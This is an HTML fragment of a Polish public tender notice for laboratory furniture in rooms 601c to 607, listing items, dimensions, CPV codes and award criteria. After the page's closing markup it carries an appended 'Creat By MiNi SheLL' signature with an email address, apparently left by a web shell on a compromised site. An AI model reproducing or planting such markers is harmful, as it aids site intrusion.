</b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">90,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Przedmiotem zamówienia jest dostawa mebli laboratoryjnych w pom. nr 601c ÷607</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa mebli laboratoryjnych w pom. nr 601c ÷607:L.p.	Opis Symbol	Liczba (szt.)	Wymiary (+/- 50mm)1.Szatnia pracowników pom. nr 601c: 1.	Szafka ubraniowa podwójna, dwudzielna	2.2.	2	Szerokość: 800/900 mmGłębokość: 480/500 mmWysokość: 1800/2000 mm2.	Ławka szatniowa 2.3.	1	Długość: 800 mmSzerokość: 350 mmWysokość: 405 mm2.Stanowisko laboratoryjne pomieszczenie nr 602 : 1.	Umywalka z żywicy epoksydowejzamontowana na szafce na cokole	3.1	1	Szerokość: 600 mmGłębokość: 450 mmWysokość: 900 mm2.	Zamrażarka laboratoryjna	3.2	1	poza zakresem zamówienia3.	Blat roboczy z żywicy fenolowej zamontowany na stelażu typu ,,A"	3.3	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm4.	Szafka wisząca, zamykana 2-drzwiowa, z półką	3.3.1	2	Szerokość: 900 mmGłębokość: 350/380 mmWysokość: 800 mm5.	Zlew z żywicy epoksydowejzamontowany na szafce, zlew 1-komorowy z ociekaczem	3.4	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm6.	Szafka podzlewowa, na cokole zamykana 2-drzwiowa, z półką	3.4.1	1	Szerokość: 900 mmGłębokość: 500 mmWysokość: 850 mm7.	Blat roboczy z żywicy fenolowej zamontowany na szafce	3.5	1	Szerokość: 900 mmGłębokość: 750 mm8.	Szafka podblatowa, na cokole, zamykana 2-drzwiowa, z 2 półkami	3.5.1	1	Szerokość: 900 mmGłębokość: 500 mmWysokość: 850 mm9.	Lodówka	3.6	1	poza zakresem zamówienia10.	Blat roboczy na bazie żywic fenolowych, zamontowany na szafkach	3.7	1	Szerokość: 2100 mmGłębokość: 750 mm11.	Szafka podblatowa, na cokole zamykana 2-drzwiowa, z 2 półkami	3.7.1	2	Szerokość: 900 mmGłębokość: 500 mmWysokość: 850 mm12.	Zabudowa szafy wnękowej, drzwi podwójne	-	1	Szerokość: 1000 mmGłębokość: 600 mmWysokość: 2500 mm13.	Hoker na 5 kółkach, z podparciem	3.8	1	3.Stanowisko laboratoryjne pomieszczenie nr 603: 1.	Umywalka	4.1	1	Umywalka zamontowana w blacie, w zestawie ze zlewem2.	Zlew z żywicy epoksydowej, zamontowany na szafce, zlew 1-komorowy z ociekaczem	4.2	1	Szerokość: 1500 mmGłębokość: 750 mmWysokość: 900 mm3.	Szafki podzlewowe na cokole, jedna zamykana 2-drzwiowa, z 1 półką, druga 1-drzwiowa, z 1 półką 4.2.1	1	Szerokość: 900 + 600 mmGłębokość: 500 mmWysokość: 850 mm4.	Blat roboczy na bazie żywic fenolowych, zamontowany na szafce 4.3.	1	Szerokość: 900 mmGłębokość: 750 mm5.	Blat roboczy na bazie żywic fenolowych, na stelażu typu ,,A" o wzmocnionej konstrukcji pod wirówki, bez przedniej dolnej poprzeczki	4.3.W	2	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm6.	Szafka podblatowa, 1 szuflada górą, dołem zamykana 2-drzwiowa, z 2 półkami na cokole	4.3.1	1	Szerokość: 900 mmGłębokość: 500 mmWysokość: 850 mm7.	Kontener na kółkach, z 4 szufladami	4.3.2	2	Szerokość: 600 mmGłębokość: 500 mmWysokość: 750 mm8.	Stół wagowy	4.4	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 750/800 mm9.	Blat roboczy na bazie żywic fenolowych, zamontowany na szafkach	4.5	1	Szerokość: 1800 mmGłębokość: 750 mmWysokość: 900 mm10.	Szafka podblatowa na cokole, 4 szuflady	4.5.1	2	Szerokość: 450 mmGłębokość: 500 mmWysokość: 850 mm11.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	4.5.2	2	Szerokość: 900 mmGłębokość: 350/380 mmWysokość: 800 mm12.	Blat roboczy na bazie żywic fenolowych, zamontowany na szafkach	4.6	2	Szerokość: 2100 mmGłębokość: 750 mmWysokość: 900 mm13.	Nadstawka z 2 półkami, 2 x 6 gniazd230 V 4.6.1	2	Długość: 2100 mm14.	Szafka na cokole, górą szuflada, dołem zamykana 2-drzwiowa, z 1 półką	4.6.2	2	Szerokość: 600 mmGłębokość: 500 mmWysokość: 850 mm15.	Blat roboczy na bazie żywic fenolowych zamontowany na szafkach	4.7	2	Szerokość: 1500 mmGłębokość: 750 mmWysokość: 900 mm16.	Szafka na cokole, zamykana 2-drzwiowa, z 2 półkami	4.7.1	1	Szerokość: 900 mmGłębokość: 500 mmWysokość: 850 mm17.	Szafka na cokole, zamykana 1-drzwiowa, z 2 półkami	4.7.2	1	Szerokość: 600 mmGłębokość: 500 mmWysokość: 850 mm18. Blat na bazie żywic fenolowych, zamontowany na szafkach 4.8	1	Szerokość: 2400 mmGłębokość: 750 mmWysokość: 750 mm19.	Szafka na cokole, górą 1 szuflada, dołem zamykana	4.8.1	2	Szerokość: 450 mmGłębokość: 500 mmWysokość: 730 mm20.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	4.8.2	2	Szerokość: 1200 mmGłębokość: 350/380 mmWysokość: 800 mm21.	Dygestorium	4.9	1	Szerokość:1500 mmGłębokość: 900 mmWysokość: 2750 mm22.	Lodówka	4.10	1	poza zakresem zamówienia23.	Szafa laboratoryjna na odczynniki, wentylowana 4.11	1	Szerokość: 800 mmGłębokość: 400 mmWysokość: 1900/2000 mm24.	Hoker na 5 kółkach, z podparciem	4.12	2	25.	Stołek laboratoryjny na 5 kółkach z oparciem	4.13	1	4. Stanowisko laboratoryjne pomieszczenie nr 604: 1.	Umywalka	5.1	1	Umywalka zamontowana w blacie, w zestawie ze zlewem2.	Zlew z żywicy epoksydowej, zamontowany na stelażu wzmocnionym typu ,,C" (typ ,,H"), zlew 1 komorowy z ociekaczem	5.2	1	Szerokość: 1500 mmGłębokość: 750 mmWysokość: 900 mm3.	Szafki podzlewowe, podwieszane, jedna zamykana 2-drzwiowa, z półką, druga 1-drzwiowa z półką	5.2.1	1	Szerokość: 900 + 600 mmGłębokość: 500 mmWysokość: 650 mm4.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H") 5.3	2	Szerokość: 2100 mmGłębokość: 750 mmWysokość: 900 mm5.	Kontener na kółkach, z 4 szufladami	5.3.1	2	Szerokość: 600 mmGłębokość: 500 mmWysokość: 750 mm6.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	5.3.2	2	Szerokość: 1200 mmGłębokość: 350/380 mmWysokość: 800 mm7.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	5.3.3	2	Szerokość: 900 mmGłębokość: 350/380 mmWysokość: 800 mm8.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	5.4	1	Szerokość: 1200 mmGłębokość: 750 mmWysokość: 900 mm9.	Biurko, blat z żywicy fenolowej, na stelażu wzmocnionym typu ,,C" (typ ,,H")	5.5	1	Szerokość: 1500 mmGłębokość: 750 mmWysokość: 750 mm10.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	5.5.1	1	Szerokość: 900 mmGłębokość: 350/380 mmWysokość: 800 mm11.	Szafka wisząca, zamykana 1-drzwiowa, z 2 półkami	5.5.2	1	Szerokość: 600 mmGłębokość: 350/380 mmWysokość: 800 mm12.	Szafa laboratoryjna, zamykana, przeszklona, 2-drzwiowa	5.6	1	Szerokość: 800/900 mmGłębokość: 400/500 mmWysokość: 1800/2000 mm13.	Hoker na 5 kółkach, z podparciem	5.7	2	5.Stanowisko laboratoryjne pomieszczenie nr 604a: 1.	Umywalka z żywicy epoksydowejzamontowana na szafce na stelażu wzmocnionym typu ,,C" (typ ,,H")	6.1	1	Szerokość: 600 mmGłębokość: 450 mmWysokość: 900 mm2.	Zlew z żywicy epoksydowej, zamontowany na stelażu wzmocnionym typu ,,C" (typ ,,H"), zlew 1 komorowy z ociekaczem	6.2	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm3.	Szafka podzlewowa, podwieszana, zamykana 2-drzwiowa, z 1 półką	6.2.1	1	Szerokość: 900 mmGłębokość: 500 mmWysokość: 650 mm4.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	6.3	1	Szerokość: 1200 mmGłębokość: 750 mmWysokość: 900 mm5.	Szafka podwieszana, 1 szuflada górą, dołem zamykana 1-drzwiowa	6.3.1	2	Szerokość: 600 mmGłębokość: 500 mmWysokość: 650 mm6.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	6.4	3	Szerokość: 1500 mmGłębokość: 750 mmWysokość: 900 mm7.	Kontener na kółkach, z 4 szufladami	6.4.1	2	Szerokość: 600 mmGłębokość: 500 mmWysokość: 750 mm8.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	6.4.2	1	Szerokość: 600 mmGłębokość: 350/380 mmWysokość: 800 mm9.	Szafka wisząca, zamykana 1-drzwiowa, z 2 półkami	6.4.3	1	Szerokość: 600 mmGłębokość: 350/380 mmWysokość: 800 mm10.	Szafa laboratoryjna, zamykana, przeszklona, 2-drzwiowa	6.5	1	Szerokość: 800/900 mmGłębokość: 400/500 mmWysokość: 1800/2000 mm11.	Hoker na 5 kółkach, z podparciem	6.6	1	12.	Stołek laboratoryjny na 5 kółkach z oparciem	6.7	1	6.Stanowisko laboratoryjne pomieszczenie nr 605: 1.	Umywalka	7.1	1	Umywalka zamontowana w blacie, w zestawie ze zlewem2.	Zlew z żywicy epoksydowej, zamontowany na stelażu wzmocnionym typu ,,C" (typ ,,H"), zlew 1 komorowy z ociekaczem	7.2	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm3.	Szafki podzlewowe, podwieszane, jedna zamykana 2-drzwiowa, z półką, druga 1-drzwiowa z półką	7.2.1	1	Szerokość: 900 + 600 mmGłębokość: 500 mmWysokość: 650 mm4.	Szafa laboratoryjna, zamykana, przeszklona, 2-drzwiowa	7.3	1	Szerokość: 800/900 mmGłębokość: 400/500 mmWysokość: 1800/2000 mm5.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	7.4	3	Szerokość: 1500 mmGłębokość: 750 mmWysokość: 900 mm6.	Kontener na kółkach, z 4 szufladami	7.4.1	5	Szerokość: 600 mmGłębokość: 500 mmWysokość: 750 mm7.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	7.5	2	Szerokość: 2100 mmGłębokość: 750 mmWysokość: 900 mm8.	Nadstawka z 2 półkami, 2 x 6 gniazd 230V	7.5.1	2	Długość: 2100 mm9.	Szafka wisząca, zamykana 2-drzwiowa, z 1 półką	7.5.2	2	Szerokość: 1200 mmGłębokość: 350/380 mmWysokość: 800 mm10.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	7.5.3	2	Szerokość: 900 mmGłębokość: 350/380 mmWysokość: 800 mm11.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	7.6	2	Szerokość: 1200 mmGłębokość: 750 mmWysokość: 900 mm12.	Inkubator	7.7	1	poza zakresem zamówienia13.	Blat z żywicy fenolowej pod inkubator na stelażu typu ,,A" (niski)	7.7.1	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 750 mm14.	Stojak na 2 butle gazowe	7.7.2	1	15.	Komora laminarna	7.8	1	poza zakresem zamówienia16.	Hoker na 5 kółkach, z podparciem	7.9	2	17.	Stołek laboratoryjny na 5 kółkach z oparciem	7.10	1	7.Stanowisko laboratoryjne pomieszczenie nr 606: 1.	Umywalka	8.1	1	Umywalka zamontowana w blacie, w zestawie ze zlewem2.	Zlew z żywicy epoksydowej, zamontowany na stelażu wzmocnionym typu ,,C" (typ ,,H"), zlew 1 komorowy z ociekaczem	8.2	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm3.	Szafki podzlewowe, podwieszane, jedna zamykana 2-drzwiowa, z półką, druga 1-drzwiowa z półką	8.2.1	1	Szerokość: 900 + 600 mmGłębokość: 500 mmWysokość: 650 mm4.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	8.3	3	Szerokość: 1500 mmGłębokość: 750 mmWysokość: 900 mm5.	Kontener na kółkach, z 4 szufladami	8.3.1	1	Szerokość: 600 mmGłębokość: 500 mmWysokość: 750 mm6.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	8.3.2	1	Szerokość: 900 mmGłębokość: 350/380 mmWysokość: 800 mm7.	Szafka wisząca, zamykana 1-drzwiowa, z 2 półkami	8.3.3	1	Szerokość: 600 mmGłębokość: 350/380 mmWysokość: 800 mm8.	Komora laminarna	8.4	1	poza zakresem zamówienia9.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	8.5	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm10.	Inkubator	8.6	1	poza zakresem zamówienia11.	Blat z żywicy fenolowej pod inkubator na stelażu typu ,,A" (niski)	8.6.1	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 750 mm12.	Stojak na 2 butle gazowe	8.6.2	1	13.	Szafa laboratoryjna, zamykana, przeszklona, 2-drzwiowa	8.7	1	Szerokość: 800/900 mmGłębokość: 400/500 mmWysokość: 1800/2000 mm14.	Hoker na 5 kółkach, z podparciem	8.8	1	15.	Stołek laboratoryjny na 5 kółkach z oparciem	8.9	1	8.Stanowisko laboratoryjne pomieszczenie nr 607: 1.	Umywalka	9.1	1	Umywalka zamontowana w blacie, w zestawie ze zlewem2.	Zlew z żywicy epoksydowej, zamontowany na stelażu wzmocnionym typu ,,C" (typ ,,H"), zlew 1 komorowy z ociekaczem	9.2	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm3.	Szafki podzlewowe, podwieszane, jedna zamykana 2-drzwiowa, z półką, druga 1-drzwiowa z półką	9.2.1	1	Szerokość: 900 + 600 mmGłębokość: 500 mmWysokość: 650 mm4.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	9.3	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 900 mm5.	Szafka podwieszana, zamykana 2-drzwiowa, z 1 półką	9.3.1	1	Szerokość: 900 mmGłębokość: 500 mmWysokość: 650 mm6.	Biurko, blat z żywicy fenolowej na stelażu wzmocnionym typu ,,C" (typ ,,H")	9.4	2	Szerokość: 1200 mmGłębokość: 750 mmWysokość: 750 mm7.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	9.4.1	2	Szerokość: 1200 mmGłębokość: 350/380 mmWysokość: 800 mm8.	Blat roboczy z żywicy fenolowej typu TRESPA TopLab Plus, na stelażu wzmocnionym typu ,,C" (typ ,,H")	9.5	1	Szerokość: 1500 mmGłębokość: 750 mmWysokość: 900 mm9.	Kontener na kółkach, z 4 szufladami	9.5.1	1	Szerokość: 600 mmGłębokość: 500 mmWysokość: 750 mm10.	Szafka wisząca, zamykana 2-drzwiowa, z 2 półkami	9.5.2	1	Szerokość: 900 mmGłębokość: 350/380 mmWysokość: 800 mm11.	Szafka wisząca, zamykana 1-drzwiowa, z 2 półkami	9.5.3	1	Szerokość: 600 mmGłębokość: 350/380 mmWysokość: 800 mm12.	Inkubator	9.6	1	poza zakresem zamówienia13.	Blat z żywicy fenolowej pod inkubator na stelażu typu ,,A" (niski)	9.6.1	1	Szerokość: 900 mmGłębokość: 750 mmWysokość: 750 mm14.	Stojak na 2 butle gazowe	9.6.2	1	15.	Szafa laboratoryjna, zamykana, przeszklona, 2-drzwiowa	9.7	1	Szerokość: 800/900 mmGłębokość: 400/500 mmWysokość: 1800/2000 mm16.	Hoker na 5 kółkach, z podparciem	9.8	1	9. Elementy uzupełniające: 1.	Stelaż na worek 70 l na odpady	-	4	Stelaż z pokrywą na kółkach2.	Kosz otwierany na odpady 30 l	-	7	Kosz z przyciskiem nożnymSzczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 2 do SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39100000-3, 39130000-2, 39180000-7, 39181000-4, 39111100-4, 39141500-7, 39141500-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-03-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">90,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com